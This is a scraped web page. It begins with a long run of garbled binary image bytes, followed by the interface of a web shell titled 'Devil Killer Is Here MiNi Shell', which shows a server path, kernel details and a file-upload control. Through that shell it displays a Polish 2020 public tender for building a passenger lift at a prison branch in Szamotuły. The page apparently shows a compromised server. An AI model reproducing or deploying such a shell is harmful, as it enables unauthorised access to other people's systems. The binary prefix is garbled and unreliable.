JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200716/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200716/562872-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 562872-N-2020 z dnia 2020-07-16 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zakład Karny</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Budowa dźwigu osobowego w budynku wartowni w Oddziale Zewnętrznym w Szamotułach Zakładu Karnego we Wronkach</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Podmiot</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Nie</TD></TR></TABLE> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc">Nie</span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zakład Karny</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">32030200000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Partyzantów</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">64-510</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Wronki</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">672 545 000</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zk_wronki@sw.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">672 545 015</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"></span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Jednostka organizacyjna Skarbu Państwa nieposiadająca osobowości prawnej - Więziennictwo</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Budowa dźwigu osobowego w budynku wartowni w Oddziale Zewnętrznym w Szamotułach Zakładu Karnego we Wronkach</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">Rb/9/zp/2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest: „Budowa dźwigu osobowego w budynku wartowni w Oddziale Zewnętrznym w Szamotułach Zakładu Karnego we Wronkach” w formule zaprojektuj i wybuduj.Przedmiot zamówienia należy wykonać zgodnie z niniejszą specyfikacją, w szczególności z opisem przedmiotu zamówienia (lit. a) i lit.b)) i zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz obowiązującymi normami, z należytą starannością oraz zasadami sztuki budowlanej. Wszystkie materiały użyte do wykonania przedmiotu zamówienia stosowane przez wykonawcę muszą być fabrycznie nowe, posiadać stosowne, wymagane przepisami prawa atesty, aprobaty techniczne, spełniać wymagane przepisami normy oraz posiadać wymagane dopuszczenia do obrotu gospodarczego.a) Zakres rzeczowy.Zamówienie obejmuje:1) Wykonanie wielobranżowej dokumentacji projektowej zgodnie z wymaganiami Zamawiającego (projekt budowlany i wykonawczy) zgodnie z wymaganiami Programu Funkcjonalno-Użytkowego (PFU) wraz z uzyskaniem wszelkich wymaganych uzgodnień, zezwoleń, decyzji niezbędnych do prawidłowego wykonania przedmiotu zamówienia i z uwzględnieniem wymogów z nich wynikających.2) Dopełnienie formalności związanych z rejestracją dźwigu w Urzędzie Dozoru Technicznego oraz uzyskania decyzji zezwalającej na eksploatację dźwigu. 3) Na podstawie opracowanej przez siebie dokumentacji projektowej wykonanie robót budowlanych.4) Sporządzenie dokumentacji powykonawczej oraz uzyskanie niezbędnych pozwoleń. b) Charakterystyczne parametry określające wielkość robótPrzedmiotem zamówienia jest budowa dźwigu osobowego wewnątrz budynku Oddziału Zewnętrznego w Szamotułach Zakładu Karnego we Wronkach. Zamówienie obejmuje, wykonanie i montaż dźwigu osobowego wraz z dostosowaniem szybu oraz wykonanie niezbędnych robót budowlano – instalacyjnych. Zamawiający wymaga, by dźwig spełniał wymagania normy dźwigowej PN-EN 81-20 i PN-EN 81-50 aktualne przepisy pożarowe, BHP, dyrektywy 2014/33/UE Urządzenia Dźwigowe oraz z polskimi przepisami wdrażającymi postanowienia dyrektywy.Zamawiający przewiduje aby zamówienie spełniało następujące założenia: Typ dźwigu – osobowy, przystosowany do przewozu osób niepełnosprawnych, Udźwig – od 400 do 630 kg / 5 – 8 osób Ilość przystanków – 3 Ilość dojść – 3 Napęd – elektryczny bezreduktorowy z odpowiednimi zabezpieczeniami zapewniającymi łagodny start i zatrzymanie Prędkość jazdy – 1 m/s Wymiary wewnętrzne szybu – 1500 mm x 1500 mm Zasilanie – 400 / 230 V; 50 Hz Kabina- Nieprzelotowa,- Podłoga: wykładzina trudnościeralna, antypoślizgowa, w kolorystyce dostosowanej do ścian kabiny i uzgodnionej z Zamawiającymi,- Ściany i sufit: segmenty ze stali nierdzewnej szczotkowanej lub malowanej proszkowo (dopuszczalne łączenie faktur), lustro na ścianie tylnej lub na częściową szerokość, - Listwy przypodłogowe: stal nierdzewna szczotkowana,- Poręcze ze stali nierdzewnej,- Oświetlenie: energooszczędne typu LED, rozproszone o natężeniu zgodnym z normą, z funkcją oświetlenia awaryjnego, z czasem podtrzymania min. 2 godz., automatyczne wyłączenie oświetlenia w kabinie po zrealizowaniu dyspozycji,- Panel dyspozycji: ze stali nierdzewnej szczotkowanej lub równoważny wyposażony w przyciski nierdzewne podświetlane z grafiką Braille`a przyciski dyspozycji, otwieranie i zamykanie drzwi,- Wentylacja: automatyczne wyłączenie wentylatora w kabinie po zrealizowaniu dyspozycji,- Kamera CCTV w kabinie: rozdzielczość: min. 1920 x 1080, ilość pikseli: min. 2Mpx obudowa: klasa szczelności (IP67), wandaloodporna (IK10),podgląd obrazu z przeglądarek internetowych: IE, Firefox, Chrome, Safari Drzwi: automatyczne teleskopowe – panelowe, stal nierdzewna szczotkowana, Inne funkcje:- Kontrola dostępu zintegrowana z istniejącym systemem u Zamawiającego, - Informacja głosowa w kabinie,- Awaryjny dojazd do najbliższego przystanku i automatyczne otwarcie drzwi,- Czujnik pożaru zjazd na przystanek podstawowy i automatyczne otwarcie drzwi,- System łączności awaryjnej do komunikacji głosowej.c) Ogólne warunki wykonania i odbioru robót budowlanychDokumentacja budowlana powinna obejmować swym opisem cały zakres prac niezbędnych do wykonania przedmiotu zamówienia w szczególności program funkcjonalno - użytkowy, a także stanowić dokumentację przebiegu prac konserwatorskich, restauratorskich opisujący w sposób jednoznaczny lokalizację przestrzenną wszystkich czynności, użytych materiałów oraz dokonanych odkryć. Dokumentacja powinna również zawierać opis sposobu postępowania z zabytkiem po zakończeniu prac stanowiących przedmiot zamówienia. Zamawiający wymaga dostarczenia dokumentacji budowlanej i wykonawczej w 4 egzemplarzach, z których jeden, po uzgodnieniu zostanie przekazany do realizacji wykonawcy. Dokumentacja budowlana i wykonawcza powinna być opracowana zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 10 maja 2013 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonywania i odbioru robót budowlanych oraz programu funkcjonalno – użytkowego (Dz.U. 2013 r. poz. 1129) i formie wynikającej z rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 września 2018 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2018 r. poz. 1935). W zakres zobowiązań projektowych wykonawcy w ramach realizacji przedmiotu zamówienia wchodzi również opracowanie informacji projektanta o wymaganiach bezpieczeństwa i ochrony zdrowia. Obowiązkiem wykonawcy jest sporządzenie także harmonogramu rzeczowo-finansowego, który będzie przedstawiał realizację przedmiotu umowy w miesięcznych okresach rozliczeniowych z podsumowaniem kwot pozycji harmonogramu w każdym miesiącu. Rozbicie przedmiotu umowy powinno być uszczegółowione co najmniej w stopniu takim, w jakim przedmiot umowy. Miesięczne okresy rozliczeniowe powinny określać procentowe zaawansowanie wykonania przedmiotu umowy.Przekazanie placu budowy i rozpoczęcie prac objętych przedmiotem zamówienia musi zostać poprzedzone pozytywnym uzgodnieniem z Zamawiającym dokumentacji projektowej (budowlanej i wykonawczej) opisującej te roboty i przekazaniem jej Zamawiającemu. Zamawiający, w trakcie realizacji umowy dopuszcza dokonywanie uzgodnionych z Zamawiającym zmian części dokumentacji wykonawczej dotyczącej użytych materiałów, dokonanych odkryć i sposobu postępowania z zabytkiem po zakończeniu prac. Pozytywne uzgodnienie z zamawiającym projektu wykonawczego nie zwalnia wykonawcy z odpowiedzialności za ewentualne wady lub braki w wykonaniu przedmiotu zamówienia, które zostaną ujawnione w trakcie odbiorów (częściowych, końcowego, ostatecznego), a które wynikną z niewłaściwych założeń projektowych.Ze względu na użytkowanie pomieszczeń, roboty budowlane powinny być prowadzone z zachowaniem szczególnych warunków bezpieczeństwa użytkowników obiektu w trakcie prowadzonych prac. Zamawiający zwraca uwagę na zamknięty charakter obiektu, na którym prowadzone będą prace. Wstęp na teren zakładu osób wykonawcy będzie każdorazowo rejestrowany i weryfikowany z imienną listą. Osoby wyznaczone przez wykonawcę do realizacji przedmiotu zamówienia zobowiązane są stawić się i odbyć szkolenie wewnętrzne dotyczące sposobu poruszania się i kontaktowania z innymi osobami na terenie zakładu a także odnośnie używania narzędzi i maszyn potrzebnych do realizacji robót. Zamawiający może odmówić wstępu na teren zakładu osobom nieprzeszkolonym, niezgłoszonym, lub nie przestrzegającym obowiązujących na terenie zakładu zasad. Wjazd pojazdów na teren zakładu jest rejestrowany, kontrolowany i podlega uprzedniemu zgłoszeniu.1.1 MEDIANiezbędne do przeprowadzenia robót media w postaci energii elektrycznej oraz dostępu do instalacji wodno-kanalizacyjnej dostępne są z instalacji zamontowanych w Oddziale Zewnętrznym w Szamotułach Zakładu Karnego we Wronkach, będących w dyspozycji Zamawiającego. Powyższe media udostępnione zostaną odpłatnie.Rozliczenie za korzystanie z instalacji wodno-kanalizacyjnej nastąpi w formie ryczałtowej, zgodnie z Rozporządzeniem Min. Infr. z 14.01.2002r., w sprawie określenia przeciętnych norm zużycia wody (Dz.U.2002 nr 8 poz.70) – tabela 3, poz. 42, w wysokości 15 dm3 wody i ścieków za każdą zadeklarowaną przez wykonawcę do wykonywania robót osobę, przemnożonej przez liczbę dni kalendarzowych realizacji robót (od dnia przekazania placu budowy do dnia potwierdzonego przez Zamawiającego, pisemnego zgłoszenia zakończenia realizacji robót). Cena 1 m3 ustalona zostanie z aktualną taryfą dostaw wody i odbioru ścieków obowiązującą w Oddziale Zewnętrznym w Szamotułach Zakładu Karny we Wronkach.Rozliczenie za korzystanie z energii elektrycznej nastąpi w formie obmiarowej, na podstawie zamontowanego podlicznika, według jego wskazań, za okres od dnia przekazania placu budowy do dnia potwierdzonego przez Zamawiającego, pisemnego zgłoszenia zakończenia realizacji robót. Licznik zostanie dostarczony i zamontowany na koszt wykonawcy, przy udziale zamawiającego. Stan początkowy i końcowy licznika zostanie wpisany i potwierdzony przez obie strony w dzienniku budowy. Cena 1 kWh energii elektrycznej, ustalona zostanie zgodnie z aktualną taryfą energii elektrycznej obowiązującą Zakład Karny we Wronkach Oddział Zewnętrzny w Szamotułach.Wykonawca może zrezygnować z korzystania z mediów udostępnianych przez zamawiającego i korzystać z własnych mediów, w sposób uzgodniony z zamawiającym. W tym celu wykonawca winien złożyć stosowne oświadczenie najpóźniej w dniu rozpoczęcia robót. Fakturę za zużyte media, obliczoną według powyższych zasad, wystawi Zakład Karny we Wronkach i obciąży nią wykonawcę przedmiotu zamówienia. Rozliczenie nastąpi przelewem, w terminie 14 dni od dnia wystawienia faktury. Potwierdzenie uregulowania należności za zużyte media będzie warunkiem podpisania przez Zamawiającego protokołu odbioru końcowego robót.Wykonawca będzie zobowiązany umową do przyjęcia odpowiedzialności od następstw i za wyniki działalności w zakresie:- organizacji i wykonywania robót budowlanych,- zabezpieczenia interesów osób trzecich,- ochrony środowiska,- warunków bezpieczeństwa pracy,- zaplecza dla potrzeb wykonawcy,- bezpieczeństwa ruchu drogowego i pieszego w otoczeniu budowy,- ochrony mienia związanego z budową.Wyroby budowlane, stosowane w trakcie wykonywania robót budowlanych, mają spełniać wymagania polskich przepisów, a wykonawca będzie posiadał dokumenty potwierdzające, że zostały one wprowadzone do obrotu, zgodnie z regulacjami ustawy o wyrobach budowlanych i posiadają wymagane parametry.1.2 KONTROLAZamawiający przewiduje bieżącą kontrolę wykonywanych robót budowlanych.Kontroli zamawiającego będą poddane w szczególności:1.rozwiązania projektowe zawarte w dokumentacji budowlanej - w aspekcie jej zgodności z programem funkcjonalno-użytkowym oraz warunkami umowy,2.stosowane gotowe wyroby budowlane w odniesieniu do dokumentów potwierdzających ich dopuszczenie do obrotu oraz zgodności parametrów z danymi zawartymi w projektach wykonawczych i programie funkcjonalno-użytkowym,1.wyroby budowlane lub elementy wytwarzane w budownictwie, np. beton konstrukcyjny lub elementy konstrukcyjne na okoliczność zgodności ich parametrów z dokumentacją projektową wykonawczą i programem funkcjonalno-użytkowym, 2.sposób wykonania robót budowlanych w aspekcie zgodności ich wykonania z projektem budowlanym, programem funkcjonalno-użytkowym i umową. Dla potrzeb zapewnienia współpracy z wykonawcą i prowadzenia kontroli wykonywanych robót budowlanych oraz dokonywania odbiorów zamawiający przewiduje ustanowienie osoby do zarządzania realizacją umowy.1.3 ODBIORYZamawiający ustala następujące rodzaje odbiorów:a) odbiór uzgodnionej dokumentacji – dotyczący sprawdzenia zgodności z programem funkcjonalno-użytkowym części projektowej przedmiotu zamówienia. Odbiór tego typu nie stanowi podstawy rozliczenia robót,b) odbiór robót zanikających i ulegających zakryciu – dotyczący sprawdzenia technicznego tych elementów, których prawidłowa ocena w trakcie odbioru końcowego będzie niemożliwa. Odbiór tego typu nie stanowi podstawy rozliczenia robót,c) odbiór częściowy – dotyczący sprawdzenia technicznego oraz rozliczenia części przedmiotu zamówieniad) 